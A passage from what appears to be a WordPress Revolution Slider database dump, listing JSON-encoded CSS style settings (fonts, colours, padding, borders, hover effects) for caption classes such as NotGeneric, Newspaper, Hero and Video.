":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"parallax\":\"-\"}'),(84,'.tp-caption.WebProduct-Content-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.65\",\"font-size\":\"16px\",\"line-height\":\"24px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"parallax\":\"-\"}'),(85,'.tp-caption.FatRounded','{\"hover\":\"true\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#d3d3d3\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"50px\",\"50px\",\"50px\",\"50px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"20px\",\"22px\",\"20px\",\"25px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0.5\",\"border-color\":\"#d3d3d3\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"50px\",\"50px\",\"50px\",\"50px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(86,'.tp-caption.NotGeneric-Title','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"[object Object]\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"70px\",\"line-height\":\"70px\",\"font-weight\":\"800\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"10px 0px 10px 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(87,'.tp-caption.NotGeneric-SubTitle','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"4px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"13px\",\"line-height\":\"20px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(88,'.tp-caption.NotGeneric-CallToAction','{\"hover\":\"true\",\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":\"0px 0px 0px 0px\",\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power3.out\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"10px 30px 10px 30px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(89,'.tp-caption.NotGeneric-Icon','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"default\",\"speed\":\"300\",\"easing\":\"power3.out\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"0px 0px 0px 0px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(90,'.tp-caption.NotGeneric-Menuitem','{\"hover\":\"true\",\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":\"0px 0px 0px 0px\",\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"27px 30px 27px 30px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.15\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(91,'.tp-caption.MarkerStyle','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"text-align\":\"left\",\"0\":\"\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"30px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"\\\"Permanent Marker\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(92,'.tp-caption.Gym-Menuitem','{\"hover\":\"true\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(93,'.tp-caption.Newspaper-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#FFFFFF\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"13px\",\"line-height\":\"17px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(94,'.tp-caption.Newspaper-Subtitle','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#a8d8ee\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(95,'.tp-caption.Newspaper-Title','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"50px\",\"line-height\":\"55px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Roboto Slab\\\"\",\"padding\":[\"0\",\"0\",\"10px\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(96,'.tp-caption.Newspaper-Title-Centered','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"50px\",\"line-height\":\"55px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Roboto Slab\\\"\",\"padding\":[\"0\",\"0\",\"10px\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"center\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(97,'.tp-caption.Hero-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(98,'.tp-caption.Video-Title','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"-20%\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(99,'.tp-caption.Video-SubTitle','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"12px\",\"line-height\":\"12px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0.35\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"-20%\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(100,'.tp-caption.NotGeneric-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"